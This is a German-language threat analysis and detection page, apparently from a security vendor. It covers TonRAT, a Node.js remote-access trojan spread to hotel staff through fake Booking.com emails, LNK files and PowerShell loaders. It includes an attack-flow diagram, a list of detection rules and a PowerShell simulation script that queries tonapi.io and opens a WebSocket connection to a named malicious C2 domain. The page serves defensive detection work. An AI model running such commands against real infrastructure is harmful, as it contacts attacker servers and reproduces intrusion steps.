Technische Analyse verdächtiger E-Mails, die auf die Hotelbranche abzielen
Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine ausgeklügelte, mehrstufige Malware-Kampagne zielt auf den Hotelsektor ab, indem sie E-Mails als Benachrichtigungen von Booking.com maskiert. Die Angriffskette kombiniert bösartige LNK-Dateien, PowerShell-Skripte und einen Remote-Access-Trojaner auf Node.js-Basis, bekannt als TonRAT. Eines der bemerkenswertesten Merkmale der Operation ist die Verwendung der The Open Network (TON) API, um dynamisch Command-and-Control-Domains zu erhalten, was das traditionelle, auf Domains basierende Blockieren weniger zuverlässig macht.
Untersuchung
Die Untersuchung deckte einen geschichteten Ausführungsablauf auf, bei dem ein anfängliches ZIP-Archiv eine LNK-Datei enthält, die PowerShell startet, um ein sekundäres Skript abzurufen. Dieses Skript entschlüsselt eine JavaScript-Nutzlast, die als TonRAT identifiziert wurde, mithilfe von AES und führt es mit einer legitimen Node.js-Laufzeit aus, die von nodejs.orgheruntergeladen wurde. Sobald aktiv, initiiert die Malware WebSocket-basierte Command-and-Control-Kommunikationen unter Verwendung von Domaininformationen, die aus den TON-Blockchain-API-Anfragen abgerufen werden.
Minderung
Empfohlene Abwehrmaßnahmen umfassen die Einschränkung der PowerShell-Ausführung, das genaue Überwachen der unbefugten Nutzung der Node.js-Laufzeit (node.exe), und die Erkennung von anormalem WebSocket-Verkehr. Organisationen sollten auch auf Verbindungen zur TON API, einschließlich tonapi.io, achten und die E-Mail-Filterung verstärken, um gefälschte Domains, verdächtige Anhänge und Phishing-Köder, die auf Hotelmitarbeiter abzielen, abzufangen.
Reaktion
Wenn ein Kompromiss vermutet wird, sollten die Sicherheitsteams den betroffenen Endpunkt sofort isolieren, um zusätzlichen Command-and-Control-Verkehr und mögliche Datenexfiltration zu verhindern. PowerShell-Betriebsprotokolle und Prozessausführungsaufzeichnungen sollten auf unerlaubte node.exe Aktivitäten überprüft werden. Eine forensische Untersuchung sollte auch auf die bekannten TonRAT-JavaScript-Hashes durchgeführt werden, zusammen mit der Untersuchung von Verbindungen zur identifizierten Command-and-Control-Infrastruktur.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc %% Node Definitions action_phishing["<b>Aktion</b> – <b id='T1566.002'>T1566.002 Phishing: Spearphishing-Link</b><br/>Beschreibung: Angreifer senden E-Mails, die Booking.com imitieren<br/>und Links zum Herunterladen einer bösartigen ZIP-Datei enthalten."] class action_phishing action action_execution["<b id='T1204.002'>T1204.002 Benutzer-Ausführung: Bösartige Datei</b><br/>Beschreibung: Benutzer führt eine .lnk-Datei aus, die im ZIP-Archiv enthalten ist."] class action_execution action process_cmd["<b id='T1059.003'>T1059.003 Befehl- und Skript-Interpreter: Windows-Kommandozeile</b><br/>Beschreibung: Ausgelöst durch einen PowerShell-Befehl, der Invoke-WebRequest verwendet,<br/>um ein sekundäres Skript herunterzuladen."] class process_cmd process malware_script["<b id='T1027'>T1027 Verschleierte Dateien oder Informationen</b><br/>Beschreibung: PowerShell-Skript LE3f0MRT.ps1 verwendet AES-Verschlüsselung<br/>um eine JavaScript-Datei (TonRAT) zu entschlüsseln."] class malware_script malware action_transfer["<b id='T1105'>T1105 Eindringender Werkzeugtransfer</b><br/>Beschreibung: Malware lädt eine legitime Node.js-Laufzeit<br/>von nodejs.org herunter, um die Nutzlast auszuführen."] class action_transfer action action_indirect["<b id='T1202'>T1202 Indirekte Befehlsausführung</b><br/>Beschreibung: Wird zur Aufrechterhaltung der Persistenz und zur Umgehung der Erkennung verwendet."] class action_indirect action action_resolution["<b id='T1568'>T1568 Dynamische Auflösung</b><br/>Beschreibung: Fragt die TON API (tonapi.io) ab, um<br/>die Command and Control C2-Domain abzurufen."] class action_resolution action malware_tonrat["<b id='T1568'>T1568 Command and Control</b><br/>Beschreibung: TonRAT stellt die Kommunikation über WebSocket her,<br/>unter Verwendung eines ECDH-Handshakes für verschlüsseltes C2."] class malware_tonrat malware %% Connections action_phishing –>|führt_zu| action_execution action_execution –>|löst_aus| process_cmd process_cmd –>|lädt_herunter| malware_script malware_script –>|führt_aus| action_transfer action_transfer –>|ermöglicht| action_indirect action_indirect –>|führt_aus| action_resolution action_resolution –>|löst_C2_auf_für| malware_tonrat malware_tonrat –>|ermöglicht| action_indirect "
Angriffsfluss
Erkennungen
Die Möglichkeit der Ausführung durch versteckte PowerShell-Befehlszeilen (über cmdline)
Ansehen
Mögliche Indikatoren für PowerShell-Verschleierung (über PowerShell)
Ansehen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)
Ansehen
PowerShell-Datei in verdächtigem Verzeichnis mit Umgehen der Ausführungsrichtlinie ausführen (über cmdline)
Ansehen
NodeJS-Binärdatei wird aus ungewöhnlichem Ort ausgeführt (über cmdline)
Ansehen
Verdächtige Änderungen in Windows Defender-Einstellungen (über PowerShell)
Ansehen
Verdächtige Command-and-Control-DNS-Anfrage durch ungewöhnliche Top-Level-Domain (TLD) (über DNS)
Ansehen
WebSocket-C2-Kommunikation über TON API in TonRAT entdeckt [Windows-Netzwerkverbindung]
Ansehen
PowerShell-Befehl für bösartigen Datei-Download und Ausführung [Windows PowerShell]
Ansehen
Simulation der Ausführung
Voraussetzung: Der Telemetriek- und Baseline-Vorabcheck muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die zur Auslösung der Erkennungsregel entwickelt wurde. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu einer Fehldiagnose.
-
Angriffsablauf und Befehle: Der Angreifer zielt darauf ab, einen WebSocket-basierten Command-and-Control (C2)-Kanal einzurichten. Um sich in legitimen Datenverkehr zu tarnen, fragt die Malware zuerst den
tonapi.ioDienst ab, um ihre C2-Infrastruktur aufzulösen. Sobald die „legitime“ API-Interaktion hergestellt ist, initiiert die Malware einen WebSocket-Handshake (wss://) zur festkodierten bösartigen Domainzloapobikahy23.bond. Diese Abfolge ist darauf ausgelegt, den Ruf der TON API zu nutzen, um die nachfolgende bösartige Verbindung zu maskieren. -
Regressionstestskript:
# Simulation der TonRAT WebSocket-C2-Kommunikation # Schritt 1: Simulation der Interaktion mit der TON API Write-Host "[+] Simulation der Interaktion mit tonapi.io..." $api_url = "https://tonapi.io/v2/blockchain/accounts/EQ..." Invoke-WebRequest -Uri $api_url -Method Get -UseBasicParsing # Schritt 2: Simulation der WebSocket-Verbindung zur bösartigen C2-Domain # Hinweis: Wir verwenden einen PowerShell-Client, um eine WSS-Anfrage zu initiieren und die 'wss://' und Domain-Logik auszulösen Write-Host "[+] Simulation der WebSocket-Verbindung zur bösartigen Domain..." $c2_url = "wss://zloapobikahy23.bond/control" # Verwendung eines .NET-WebSockets-Clients, um sicherzustellen, dass 'wss://' in der Telemetrie vorhanden ist $ws = New-Object System.Net.WebSockets.ClientWebSocket $cts = New-Object System.Threading.CancellationTokenSource $uri = New-Object System.Uri($c2_url) try { $task = $ws.ConnectAsync($uri, $cts.Token) # Wir benötigen keine erfolgreiche Verbindung, nur der Versuch soll das Log erzeugen $task.Wait(5000) } catch { Write-Host "[!] Verbindung, wie erwartet, fehlgeschlagen (Domain existiert nicht), aber die Telemetrie sollte generiert werden." } finally { $ws.Dispose() } -
Bereinigungsbefehle:
# Dieses Skript erzeugt keine persistente Artefakte, aber wir löschen die Konsole Clear-Host Write-Host "Bereinigung der Simulation abgeschlossen."